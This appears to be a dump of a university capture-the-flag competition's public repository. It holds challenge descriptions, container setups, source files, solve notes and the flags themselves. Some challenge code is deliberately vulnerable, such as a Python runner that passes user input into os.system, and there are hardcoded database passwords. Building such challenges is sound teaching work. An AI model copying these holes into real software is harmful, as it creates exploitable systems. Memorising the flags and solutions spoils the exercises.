36 | 37 | 38 | -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket/chal/src/static/antwerp.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket/chal/src/static/antwerp.jpg -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket/chal/src/static/guam.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket/chal/src/static/guam.jpg -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket/solve/solve.md: -------------------------------------------------------------------------------- 1 | Navigate to https://storage.googleapis.com/out-of-the-bucket and we find another folder secret/. The flag is thus located in https://storage.googleapis.com/out-of-the-bucket/secret/dont_show -------------------------------------------------------------------------------- /Miscellaneous/Prediction API/README.md: -------------------------------------------------------------------------------- 1 | Challenge: Prediction API 2 | 3 | Description: I downloaded a model that performs categorical classification on images. I want to use this model in a web application, but it doesn't seem to be very accurate. Can you check out the weights and see if you can figure out what's wrong? -------------------------------------------------------------------------------- /Miscellaneous/Prediction API/solve/flag: -------------------------------------------------------------------------------- 1 | UofTCTF{1t_w4s_ju5t_mn1st_101} 2 | -------------------------------------------------------------------------------- /Miscellaneous/Prediction API/solve/solve.md: -------------------------------------------------------------------------------- 1 | The attack for random noise model extraction is presented here: https://arxiv.org/pdf/1912.08987.pdf. Model extraction attacks were first explored in this paper: https://arxiv.org/abs/1609.02943 2 | 3 | The provided proof of concept is an implementation of the pseudocode presented -- the solution does not interact with the server as in the challenge, but this can be easily adapted using Zipfile and requests. Additionally, the PoC is in Pytorch, but this can be adapted to Tensorflow easily. Notably, the solution achieves <1% margin of error from the victim model, but the flag checker only required <20% margin of error. 4 | 5 | An alternative solution is to notice the 28x28 image requirement and a softmax vector output with 10 classes -- one can infer that the model is likely a CNN trained on MNIST. With some simple inputs, you can verify that the model is indeed trained on MNIST. Then, it is as simple as training a model with identical architecture on the same dataset. Training set leaks can also be performed to obtain more information about the dataset. -------------------------------------------------------------------------------- /Miscellaneous/Prediction API/src/mnist.npz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Prediction API/src/mnist.npz -------------------------------------------------------------------------------- /Miscellaneous/Prediction API/src/model.h5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Prediction API/src/model.h5 -------------------------------------------------------------------------------- /Miscellaneous/Prediction API/src/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==2.3.3 2 | h5py==3.10.0 3 | Jinja2==3.1.2 4 | keras==2.15.0 5 | numpy==1.25.2 6 | requests==2.31.0 7 | requests-oauthlib==1.3.1 8 | tensorflow==2.15.0 9 | Werkzeug==2.3.7 10 | zipp==3.17.0 11 | gunicorn==21.2.0 -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/README.md: -------------------------------------------------------------------------------- 1 | # Source Code Recovery 2 | 3 | Oops I deleted the source code, do you mind recovering it? -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.8" 2 | services: 3 | flag_server: 4 | build: 5 | context: ./flag_server 6 | ports: 7 | - "1337:1337" 8 | volumes: 9 | - type: bind 10 | source: ./submissions/src 11 | target: /submit/src 12 | - type: bind 13 | source: ./submissions/binary 14 | target: /submit/binary 15 | depends_on: 16 | - exec_jail 17 | exec_jail: 18 | build: 19 | context: ./exec_jail 20 | ports: 21 | - "5000:5000" 22 | volumes: 23 | - type: bind 24 | source: ./submissions/binary 25 | target: /srv/submit/binary 26 | read_only: true 27 | privileged: true 28 | 29 | -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/exec_jail/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye AS app 2 | 3 | RUN useradd -m ctfuser 4 | 5 | RUN chown root:root /home/ctfuser 6 | 7 | RUN chmod 755 /home/ctfuser 8 | 9 | WORKDIR /home/ctfuser/app 10 | 11 | COPY --chown=root:root exec_jail.py . 12 | 13 | RUN chown -R root:root /home/ctfuser && \ 14 | chmod -R 555 /home/ctfuser/app 15 | 16 | FROM pwn.red/jail 17 | 18 | COPY --from=app / /srv 19 | 20 | COPY --chmod=555 ./run /srv/app/run 21 | 22 | ENV JAIL_PIDS=50 JAIL_MEM=25M JAIL_TIME=120 JAIL_TMP_SIZE=100K 23 | -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/exec_jail/exec_jail.py: -------------------------------------------------------------------------------- 1 | import ast 2 | import subprocess 3 | import base64 4 | import os 5 | 6 | d = ast.literal_eval(base64.b64decode(input()).decode()) 7 | 8 | os.system(f"cp {d['executable']} /tmp/a.out && chmod +x /tmp/a.out") 9 | 10 | b = subprocess.check_output(["/tmp/a.out"], input=d["otp"], stderr=subprocess.STDOUT, timeout=20) 11 | print(b.decode(), end="") 12 | -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/exec_jail/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/python exec_jail.py 4 | -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/flag_server/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y gcc socat sudo netcat-traditional && \ 5 | apt-get clean && \ 6 | rm -rf /var/lib/apt/lists/* 7 | 8 | RUN mkdir /app 9 | 10 | COPY --chown=root --chmod=500 flag_server.py /app/flag_server.py 11 | COPY --chown=root --chmod=500 flag.py /app/flag.py 12 | 13 | RUN chown root:root /app && \ 14 | chmod 700 /app 15 | 16 | 17 | EXPOSE 1337 18 | 19 | WORKDIR /app 20 | 21 | ENTRYPOINT ["socat", "TCP-LISTEN:1337,reuseaddr,fork", "EXEC:'python /app/flag_server.py',pty,ctty,stderr,raw,echo=0"] 22 | -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/flag_server/flag.py: -------------------------------------------------------------------------------- 1 | FLAG = "uoftctf{ree3eeCurzi0n_Thm_stA73s_Tur1ng_mACH1Nes_CAn_kNOw_th31r_oWn_s0URCe}" 2 | -------------------------------------------------------------------------------- /Miscellaneous/Source Code Recovery/remote_chal/setup.sh: -------------------------------------------------------------------------------- 1 | sudo mkdir submissions submissions/src submissions/binary 2 | sudo chmod 333 submissions submissions/src submissions/binary 3 | sudo docker compose up --build --force-recreate 4 | -------------------------------------------------------------------------------- /OSINT/Flying High/README.md: -------------------------------------------------------------------------------- 1 | Name: Flying High 2 | 3 | Description: 4 | I'm trying to find a flight I took back in 2012. I forgot the airport and the plane, but I know it is the one with an orange/red logo on the right side of this photo I took. Can you help me identify it? 5 | 6 | The flag format is UofTCTF{AIRPORT_AIRLINE_AIRCRAFT}. AIRPORT is the 3 letter IATA code, AIRLINE is the name of the airline (dash-separated if required), and AIRCRAFT is the aircraft model and variant (omit manufacturer name). For example, UofTCTF{YYZ_Air-Canada_A320-200} or UofTCTF{YYZ_Delta_767-300}. 7 | 8 | Note: The aircraft variant should be of X00 format; ie. there may be models with XYZ-432, but the accepted variant will be XYZ-400. -------------------------------------------------------------------------------- /OSINT/Flying High/chal/airplane.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/OSINT/Flying High/chal/airplane.png -------------------------------------------------------------------------------- /OSINT/Flying High/solve/flag.txt: -------------------------------------------------------------------------------- 1 | UofTCTF{BOD_Iberia_A340-600} 2 | UofTCTF{BOD_Iberia_A340-300} -------------------------------------------------------------------------------- /OSINT/Flying High/solve/solve.md: -------------------------------------------------------------------------------- 1 | From the company "Novespace" we can easily determine it is French and based in the Bordeaux region. [The following link](https://www.airzerog.com/novespace-and-avico/) states "Based in the Bordeaux-Mérignac airport area" so the airport is Bordeaux-Mérignac and 3-letter IATA code is BOD. 2 | 3 | Taking a look at the plane, we can check the tail logo via [the following tool](https://airlinersgallery.smugmug.com/Airline-Tails/Airline-Tails/). We see that the airline is Air Nostrum from [this](https://airlinersgallery.smugmug.com/Airline-Tails/Airline-Tails/i-tbxJNgq/A). However, Air Nostrum is now in a merger and the logo was held by Iberia ([based on this](https://en.wikipedia.org/wiki/Iberia_(airline)#/media/File:Iberia_logo.svg)) in 2012. 4 | 5 | Additionally, this is confirmed by the fact that Air Nostrum doesn't own any long-haul aircraft with 4 engines ([see here](https://web.archive.org/web/20120720152644/http://en.wikipedia.org/wiki/Air_Nostrum)). We can thus conclude the aircraft is owned by Iberia. 6 | 7 | We can now narrow down a list of aircraft using [this tool](https://www.aircraftrecognitionguide.com/identify-aircraft/identify-by-airplane-characteristics). The characteristics are: 8 | * 4 jets 9 | * Engines under wings 10 | * Swept wings 11 | * Nose wheel landing gear 12 | 13 | We see a collection of aircraft including the A340. 14 | 15 | From [Iberia's wiki page](https://en.wikipedia.org/wiki/Iberia_(airline)), we can see the only 4-engine aircraft owned by Iberia in 2012 is the Airbus A340-600 or A340-300. So the flag is: 16 | 17 | **UofTCTF{BOD_Iberia_A340-600}** or **UofTCTF{BOD_Iberia_A340-300}** (both were accepted) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # University of Toronto Capture the Flag Competition 2024 2 | This repository contains the solutions to challenges during UofTCTF 2024. The source is also included in most of the challenge directories. 3 | -------------------------------------------------------------------------------- /Reverse Engineering/AllWorbledUp/readme.md: -------------------------------------------------------------------------------- 1 | # all worbled up 2 | 3 | ## desc 4 | 5 | last time we had a worbler, it failed miserably and left everyone sad, and no one got their flags. 6 | now we have another one, maybe it'll work this time? 7 | 8 | output: 9 | 10 | ```text 11 | _ _ 12 | | | | | 13 | __ _____ _ __| |__ | | ___ _ __ 14 | \ \ /\ / / _ \| '__| '_ \| |/ _ \ '__| 15 | \ V V / (_) | | | |_) | | __/ | 16 | \_/\_/ \___/|_| |_.__/|_|\___|_| 17 | 18 | ========================================== 19 | Enter flag: *redacted* 20 | Here's your flag: a81c0750d48f0750 21 | ``` 22 | 23 | ## flag 24 | 25 | `uoftctf{d3w0rb13d}` 26 | -------------------------------------------------------------------------------- /Reverse Engineering/AllWorbledUp/solve/makedis.py: -------------------------------------------------------------------------------- 1 | import dis 2 | import worbler 3 | 4 | dis.dis(worbler.main) -------------------------------------------------------------------------------- /Reverse Engineering/AllWorbledUp/solve/soln.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | This challenge is simply disassembled Python bytecode. The objective is to reconstruct the source script (`worbler.py`) and find the flag based on the given output. The regex gives a hint as to what characters and how many of them the flag has. 4 | 5 | The solve script is in the solve directory as `soln.py`. Running it should produce the flag. 6 | -------------------------------------------------------------------------------- /Reverse Engineering/AllWorbledUp/solve/soln.py: -------------------------------------------------------------------------------- 1 | from itertools import product 2 | 3 | def worbble(s): 4 | s1 = 5 5 | s2 = 31 6 | 7 | for n in range(len(s)): 8 | s1 = (s1 + ord(s[n]) + 7) % 65521 9 | s2 = (s1 * s2) % 65521 10 | 11 | return (s2 << 16) | s1 12 | 13 | def shmorble(s): 14 | r = "" 15 | for i in range(len(s)): 16 | r += s[i - len(s)] 17 | 18 | return r 19 | 20 | def blorble(a, b): 21 | return format(a, 'x') + format(b, 'x') 22 | 23 | for s in product("bdrw013", repeat=9): 24 | string = "uoftctf{" + "".join(s) + "}" 25 | a = worbble(string) 26 | b = worbble(string[::-1]) 27 | 28 | final = shmorble(blorble(a, b)) 29 | 30 | if final == "a81c0750d48f0750": 31 | print(final, string) -------------------------------------------------------------------------------- /Reverse Engineering/AllWorbledUp/solve/worbler.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | pattern = re.compile('^uoftctf\\{([bdrw013]){9}\\}$') 4 | 5 | def worble(s): 6 | s1 = 5 7 | s2 = 31 8 | 9 | for n in range(len(s)): 10 | s1 = (s1 + ord(s[n]) + 7) % 65521 11 | s2 = (s1 * s2) % 65521 12 | 13 | return (s2 << 16) | s1 14 | 15 | def shmorble(s): 16 | r = "" 17 | for i in range(len(s)): 18 | r += s[i - len(s)] 19 | 20 | return r 21 | 22 | def blorble(a, b): 23 | return format(a, 'x') + format(b, 'x') 24 | 25 | print(" _ _ ") 26 | print(" | | | | ") 27 | print(" __ _____ _ __| |__ | | ___ _ __ ") 28 | print(" \ \ /\ / / _ \| '__| '_ \| |/ _ \ '__| ") 29 | print(" \ V V / (_) | | | |_) | | __/ | ") 30 | print(" \_/\_/ \___/|_| |_.__/|_|\___|_| ") 31 | print(" ") 32 | print("==========================================") 33 | 34 | flag = input("Enter flag: ") 35 | if not pattern.match(flag): 36 | print("Incorrect format!") 37 | else: 38 | a = worble(flag) 39 | b = worble(flag[::-1]) 40 | 41 | print("Here's your flag:", shmorble(blorble(a, b))) -------------------------------------------------------------------------------- /Reverse Engineering/CEOs Lost Password/chal/BankChallenge.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Reverse Engineering/CEOs Lost Password/chal/BankChallenge.jar -------------------------------------------------------------------------------- /Reverse Engineering/CEOs Lost Password/readme.md: -------------------------------------------------------------------------------- 1 | Challenge: CEO's lost password 2 | 3 | Description: Hello there brave programmer! 4 | 5 | I am the CEO of TotallySecureBank™, I have a lot of money in my bank account but I forgot my password! My username is `admin` and I have $100000 in my account. 6 | 7 | If you could recover my account you can use my password as a flag (flag would be `uoftctf{MyPasswordHere}`) 8 | 9 | You can try the bank software by running `java -jar BankChallenge.jar` and use the example user `user` with the password being `example`. -------------------------------------------------------------------------------- /Reverse Engineering/CEOs Lost Password/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{%S7rONgadMInPaSSwORd32!%} -------------------------------------------------------------------------------- /Reverse Engineering/CEOs Lost Password/solve/readme.md: -------------------------------------------------------------------------------- 1 | The bank software used a terrible hashing method for their passwords, it is reversible. 2 | To get the password you had to decompile the jar file using a decompiler, then you had to locate the hash function and the admin's hash. Finally you had to reverse the hash function. 3 | See `solution.java` for a more technical explanation. -------------------------------------------------------------------------------- /Reverse Engineering/CSS Password/README.md: -------------------------------------------------------------------------------- 1 | Challenge: CSS Password 2 | 3 | Description: My web developer friend said JavaScript is insecure so he made a password vault with CSS. Can you find the password to open the vault? 4 | 5 | Wrap the flag in `uoftctf{}` 6 | 7 | Make sure to use a browser that supports the CSS `:has` selector, such as Firefox 121+ or Chrome 105+. The challenge is verified to work for Firefox 121.0. 8 | -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/chal/maze: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Reverse Engineering/RandomMaze/chal/maze -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/chal/soln.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Looking at the source code file `nodes.c`, we see that there are 8 nodes, and each node is a binary tree node that contains the node to the next tree, and a null pointer. At the very bottom of the tree is a pointer to the function to call, `profit()` which prints out the flag. 4 | 5 | The flag is stored in an array where each character has been XORed with a different byte, so the flag cannot be read directly from the decompiler. In the main file `maze.c`, the solver's answer is read in as a 64-bit long in hexadecimal format, and then re-cast as an 8-byte array, each containing the number that is considered for each node. 6 | 7 | Each number is then checked for parity and validity. If it is even, the right node is taken. If it is odd, the left node is taken. Additionally, there are additional checks on the number (like if it is divisible by 3 or 4), which render the number invalid, upon which the `oops()` function is called and the maze fails. If the number is valid, it is XORed with the corresponding number in the flag array, and if the number is correct, the resulting XOR operation should result in the correct flag character. 8 | 9 | The objective is to figure out which numbers solve the maze, and the point of the checks (both for validity and parity) are meant to help narrow down the solution space. This is also why I gave the free hint 10 | that the flag is completely alphanumeric, ruling out all other ASCII characters. This will of course involve some guess and check, but a bunch of educated reasoning is also required. 11 | 12 | The solution is thus to enter in each byte in hexadecimal form when prompted, in reverse order since x64 is little endian. 13 | 14 | The correct numbers can be found in the `maze.c` source file. 15 | -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/readme.md: -------------------------------------------------------------------------------- 1 | # the maze 2 | 3 | ## desc 4 | 5 | a little maze for you! just don't get lost! :3 6 | 7 | free hint: the entire flag is alphanumeric ASCII. 8 | 9 | ## flag 10 | 11 | `uoft{am4z31ng}` 12 | -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/solve/nodes.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include "nodes.h" 4 | 5 | extern void profit(); 6 | extern void oops(); 7 | 8 | struct node level8 = { 9 | NULL, 10 | NULL, 11 | profit, 12 | }; 13 | 14 | struct node level7 = { 15 | &level8, 16 | NULL, 17 | NULL, 18 | }; 19 | 20 | struct node level6 = { 21 | NULL, 22 | &level7, 23 | NULL, 24 | }; 25 | 26 | struct node level5 = { 27 | NULL, 28 | &level6, 29 | NULL, 30 | }; 31 | 32 | struct node level4 = { 33 | &level5, 34 | NULL, 35 | NULL, 36 | }; 37 | 38 | struct node level3 = { 39 | NULL, 40 | &level4, 41 | NULL, 42 | }; 43 | 44 | struct node level2 = { 45 | &level3, 46 | NULL, 47 | NULL, 48 | }; 49 | 50 | struct node level1 = { 51 | &level2, 52 | NULL, 53 | NULL, 54 | }; -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/solve/nodes.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | struct node { 4 | struct node *left; 5 | struct node *right; 6 | void (*hmmmm)(void); 7 | }; 8 | 9 | -------------------------------------------------------------------------------- /Reverse Engineering/RandomMaze/solve/soln.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define LEFT 1 4 | #define RIGHT 0 5 | 6 | int main() { 7 | int lr[8] = {RIGHT, LEFT, LEFT, RIGHT, LEFT, RIGHT, RIGHT, LEFT}; 8 | 9 | char flag[] = "ON#X~o8&"; // encrypted flag 10 | char ans[] = "am4z31ng"; 11 | 12 | for (int i = 0; i < 8; i++) { 13 | ans[i] ^= flag[i]; 14 | } 15 | 16 | printf("%llx\n", *(unsigned long long *)ans); 17 | 18 | for (int i = 0; i < 8; i++) { 19 | if (ans[i] & 3 == 0 || ans[i] == (ans[i] / 3) * 3) { 20 | printf("Character ruled out: %02x\n", ans[i]); 21 | return 1; 22 | } 23 | } 24 | 25 | unsigned char sol[8]; 26 | 27 | for (int i = 0; i < 8; i++) { 28 | int found_char = 0; 29 | for (unsigned char c = 0x14; c <= 'd' ; c++) { 30 | if ((c & 3) == 0) 31 | continue; 32 | if (c == (c / 3) * 3) 33 | continue; 34 | 35 | if ((c & 1) == lr[i]) { 36 | printf("%02x", c); 37 | sol[i] = c; 38 | found_char = 1; 39 | break; 40 | } 41 | } 42 | 43 | if (!found_char) { 44 | printf("No character found for %d\n", i); 45 | return 1; 46 | } 47 | } 48 | 49 | puts(""); 50 | 51 | printf("%llx\n", *(unsigned long long *)sol); 52 | 53 | return 0; 54 | } -------------------------------------------------------------------------------- /Reverse Engineering/love-debug/chal/love-letter-for-you: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Reverse Engineering/love-debug/chal/love-letter-for-you -------------------------------------------------------------------------------- /Reverse Engineering/love-debug/solve/result.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Reverse Engineering/love-debug/solve/result.bin -------------------------------------------------------------------------------- /Reverse Engineering/love-debug/solve/result2.bin: -------------------------------------------------------------------------------- 1 | ❤️ 2 |  3 |     Are you amazed? You like it? Say something! 4 | You're just here for the flag, are you? 5 | uoftctf{r3CuR51v3LY_3nuM3r4Bl3_R1zZ} -------------------------------------------------------------------------------- /Reverse Engineering/love-debug/src/README.md: -------------------------------------------------------------------------------- 1 | # Love Debug - Source 2 | 3 | All of the bf code here was originally written in a C-like language 4 | compiled to Brainf**k using [this compiler](https://github.com/arthaud/c2bf). 5 | 6 | The Brainf**k code was then compiled to native x86-64 7 | using [a compiler made by yours truly](https://github.com/kako57/bf-compiler) 8 | 9 | `love-letter-for-you.bf` is the code for the challenge. 10 | Depending on the terminal, it might print a squished heart 11 | or a squished heart. 12 | 13 | If you want the code for the "fixed" heart, in here 14 | are three sources for the three different terminals 15 | I use the most. These don't include the challenge, 16 | so feel free to send hearts to people ~~while f**king 17 | their brains out~~. 18 | 19 | ``` 20 | alacritty.bf # for alacritty 21 | vscode.bf # for vscode terminal 22 | windows-terminal.bf # for windows terminal 23 | ``` 24 | -------------------------------------------------------------------------------- /Web/Guestbook/README.md: -------------------------------------------------------------------------------- 1 | Name: CTF Guestbook 2 | 3 | Description: I made this cool guestbook for the CTF. Please sign it. -------------------------------------------------------------------------------- /Web/Guestbook/chal/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | My Guestbook 6 | 16 | 17 | 18 |

19 | Hi! I made this guestbook for my site, please sign it. 20 |

21 | 22 |

Last 10 user entries in the guestbook:

23 |

Loading...

24 |
    25 |
26 | 27 |

Sign the guestbook:

28 |
29 | 30 | 31 | 32 |
33 | 34 | -------------------------------------------------------------------------------- /Web/Guestbook/solve/README.md: -------------------------------------------------------------------------------- 1 | To solve this puzzle you first need to notice that the guestbook HTML code references a google sheet with id `1PGFh37vMWFrdOnIoItnxiGAkIqSxlJDiDyklp9OVtoQ` 2 | 3 | Opening https://docs.google.com/spreadsheets/d/1PGFh37vMWFrdOnIoItnxiGAkIqSxlJDiDyklp9OVtoQ we find all the guestbook entery 4 | 5 | Doing a quick search for "uofctf" shows that we are on the right track because it finds a partial flag in a hidden sheet 6 | 7 | To access the hidden sheet we can download the sheet as a .xlsx file (or make a copy) which would include the hidden sheets. -------------------------------------------------------------------------------- /Web/Guestbook/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{@PP 5cRIP7 !5 s0 coOL} -------------------------------------------------------------------------------- /Web/Jay's Bank/README.md: -------------------------------------------------------------------------------- 1 | # Jay's Bank 2 | 3 | My bank is still in pre-alpha-alpha-alpha stage, but I'm sure it's secure enough to keep all of your information safe. -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20-bullseye-slim 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y default-mysql-client netcat 5 | 6 | WORKDIR /app 7 | 8 | COPY package*.json ./ 9 | RUN npm install 10 | 11 | COPY index.js ./ 12 | COPY views ./views 13 | COPY utils ./utils 14 | COPY static ./static 15 | COPY routes ./routes 16 | COPY middleware ./middleware 17 | COPY config/init.sql ./config/init.sql 18 | 19 | EXPOSE 3000 20 | 21 | CMD bash -c "echo Waiting for MySQL to start... && \ 22 | while ! nc -z db 3306; do sleep 1; done; \ 23 | echo MySQL started; \ 24 | npm start" 25 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/config/init.sql: -------------------------------------------------------------------------------- 1 | ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'YNgBBTYdXcXKcQmYBzqYM7Xx9KoEDAy1'; 2 | CREATE USER 'web'@'localhost' IDENTIFIED WITH mysql_native_password BY 'J7zZR60PmM3TmaBk8sVW5fVz8za2svp1'; 3 | FLUSH PRIVILEGES; 4 | DROP DATABASE IF EXISTS ctf_challenge; 5 | CREATE DATABASE ctf_challenge; 6 | USE ctf_challenge; 7 | 8 | CREATE TABLE users ( 9 | id INT NOT NULL AUTO_INCREMENT, 10 | username NVARCHAR(255) NOT NULL, 11 | password NVARCHAR(255) NOT NULL, 12 | data NVARCHAR(255) NOT NULL, 13 | PRIMARY KEY (id) 14 | ); 15 | 16 | INSERT INTO users (username, password, data) VALUES ('admin', '9LCD5iU78ZbtsHhcDgGvsT9Z1Nvy54z8', '{"role": "not_admin_lmao"}'); 17 | 18 | GRANT INSERT, SELECT, UPDATE ON ctf_challenge.users TO 'web'@'localhost'; 19 | FLUSH PRIVILEGES; -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | services: 3 | app: 4 | build: 5 | context: . 6 | dockerfile: Dockerfile 7 | ports: 8 | - "3000:3000" 9 | depends_on: 10 | - db 11 | environment: 12 | - FLAG=uoftctf{IiIiIiI_am_a_pro_JSON_injector_IiIiIiI} 13 | - DB_HOST=db 14 | - MYSQL_USER=web 15 | - MYSQL_PASSWORD=J7zZR60PmM3TmaBk8sVW5fVz8za2svp1 16 | - MYSQL_DATABASE=ctf_challenge 17 | db: 18 | image: mysql:5.7 19 | volumes: 20 | - ./config/init.sql:/docker-entrypoint-initdb.d/init.sql 21 | environment: 22 | MYSQL_ROOT_PASSWORD: YNgBBTYdXcXKcQmYBzqYM7Xx9KoEDAy1 23 | MYSQL_DATABASE: ctf_challenge 24 | MYSQL_USER: web 25 | MYSQL_PASSWORD: J7zZR60PmM3TmaBk8sVW5fVz8za2svp1 26 | command: ["--sql-mode=NO_ENGINE_SUBSTITUTION,ERROR_FOR_DIVISION_BY_ZERO"] 27 | ports: 28 | - "3306:3306" 29 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/index.js: -------------------------------------------------------------------------------- 1 | const express = require("express"); 2 | const router = require("./routes"); 3 | const db = require("./utils/db.js"); 4 | const cookieParser = require("cookie-parser"); 5 | const app = express(); 6 | 7 | const Database = new db(); 8 | 9 | app.use(express.json()); 10 | app.use(cookieParser()); 11 | app.use(express.static("static")); 12 | app.set("view engine", "ejs"); 13 | 14 | app.use("/", router(Database)); 15 | 16 | app.all("*", (req, res) => { 17 | res.status(404).send("404 Not Found"); 18 | }); 19 | 20 | app.listen(3000, () => { 21 | console.log("Listening on port 3000"); 22 | }); 23 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/middleware/authMiddleware.js: -------------------------------------------------------------------------------- 1 | const jwt = require("jsonwebtoken"); 2 | const {JWT_SECRET} = require("../utils/config.js"); 3 | 4 | const jwtAuth = (req, res, next) => { 5 | const token = req.cookies.auth_token; 6 | if (!token) { 7 | return res.status(401).redirect("/login"); 8 | } 9 | try { 10 | const decoded = jwt.verify(token, JWT_SECRET); 11 | if (typeof decoded !== "object" || typeof decoded.username !== "string") { 12 | return res.status(401).redirect("/login"); 13 | } 14 | req.user = { username: decoded.username }; 15 | next(); 16 | } catch { 17 | res.status(401).redirect("/login"); 18 | } 19 | }; 20 | 21 | module.exports = jwtAuth; 22 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "chal", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "start": "node index.js" 8 | }, 9 | "keywords": [], 10 | "author": "SteakEnthusiast", 11 | "license": "ISC", 12 | "dependencies": { 13 | "cookie-parser": "^1.4.6", 14 | "ejs": "^3.1.9", 15 | "express": "^4.18.2", 16 | "jsonwebtoken": "^9.0.2", 17 | "mysql": "^2.18.1" 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/css/dashboard.css: -------------------------------------------------------------------------------- 1 | body { 2 | font-family: Arial, sans-serif; 3 | background-color: #f9f9f9; 4 | margin: 0; 5 | padding: 0; 6 | } 7 | 8 | .container { 9 | max-width: 800px; 10 | margin: 20px auto; 11 | padding: 20px; 12 | background-color: #fff; 13 | border-radius: 8px; 14 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 15 | } 16 | 17 | h1 { 18 | color: #333; 19 | } 20 | 21 | p { 22 | margin: 10px 0; 23 | } 24 | 25 | nav ul { 26 | padding: 0; 27 | list-style-type: none; 28 | background: #007bff; 29 | padding: 10px; 30 | border-radius: 5px; 31 | margin-bottom: 20px; 32 | display: flex; 33 | } 34 | 35 | nav ul li { 36 | margin-right: 20px; 37 | } 38 | 39 | nav ul li a { 40 | color: white; 41 | text-decoration: none; 42 | } 43 | 44 | nav ul li a:hover { 45 | text-decoration: underline; 46 | } 47 | 48 | a { 49 | color: #007bff; 50 | text-decoration: none; 51 | } 52 | 53 | a:hover { 54 | text-decoration: underline; 55 | } 56 | 57 | .warning { 58 | color: #856404; 59 | background-color: #fff3cd; 60 | border-color: #ffeeba; 61 | padding: 0.75rem 1.25rem; 62 | margin-bottom: 1rem; 63 | border: 1px solid transparent; 64 | border-radius: 0.25rem; 65 | text-align: center; 66 | } 67 | -------------------------------------------------------------------------------- /Web/Jay's Bank/chal/static/css/login.css: -------------------------------------------------------------------------------- 1 | .container { 2 | width: 100%; 3 | max-width: 400px; 4 | margin: 50px auto; 5 | padding: 20px; 6 | background-color: #f9f9f9; 7 | border-radius: 8px; 8 | box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); 9 | } 10 | 11 | h1 { 12 | text-align: center; 13 | color: #333; 14 | } 15 | 16 | .form-group { 17 | margin-bottom: 20px; 18 | } 19 | 20 | label { 21 | display: block; 22 | margin-bottom: 5px; 23 | color: #666; 24 | } 25 | 26 | input[type="text"], 27 | input[type="password"] { 28 | width: calc(100% - 22px); 29 | padding: 10px; 30 | border: 1px solid #ddd; 31 | border-radius: 4px; 32 | box-sizing: border-box; 33 